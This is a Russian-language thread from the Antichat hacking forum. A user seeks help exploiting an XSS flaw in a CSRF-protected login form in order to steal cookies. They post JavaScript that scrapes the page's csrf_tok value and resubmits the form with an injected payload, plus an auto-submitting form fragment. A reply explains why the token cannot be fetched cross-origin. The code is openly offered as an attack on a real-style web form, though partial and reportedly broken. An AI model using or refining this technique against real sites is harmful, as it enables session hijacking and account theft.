Форум АНТИЧАТ - Пасивка в форме с csrf токеном

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Пасивка в форме с csrf токеном (https://forum.antichat.xyz/showthread.php?t=450342)

Как заюзать данную брешь ? форма с iframe не пройдет поскольку токен не пустит. Парсить токен ? Подскажите решение

Вот форма уязвимая к XSS . В ней есть токен csrf_tok

Код HTML:

HTML:



  

  

  

document.getElementsByTagName('form')[0].submit();

Для того что бы стырить куки, надо отправить эту форму с правильным токеном. Значит сперва его нужно выдернуть и вставить в свою форму.

Создаю js который вставляю в уязвимое к XSS поле

Код HTML:

HTML:

function request(url, type, callback, send){

      var oReq = new XMLHttpRequest();

      oReq.open(type, url, true);

      oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');

      oReq.onload = callback;

      oReq.send(send);

  };

  function getListener () {

      var el = document.createElement('div');

      el.innerHTML = this.responseText;

      request('login', 'POST', postListener, 'csrf_tok=' + el.querySelector('input[name="csrf_tok"]').value + '&Login=alert(xss)'+ '&Pass=12345678');

  };

  function postListener(){

      console.log(this.responseText)

  };

  request('login', 'GET', getListener);

Подскажите где ошибка.

Цитата:

Сообщение от sergei_petrovish

sergei_petrovish said:
↑
Для того что бы стырить куки, надо отправить эту форму с правильным токеном. Значит сперва его нужно выдернуть и вставить в свою форму.

Если XSS работает только при указании правильного токена, вам нужно получить токен. Но получить его без выполнения JS на стороне жертвы не удастся. Взаимоисключение получается.

А спарсить токен со своего домена не получится, ибо кросс-доменная политика запросов не даст.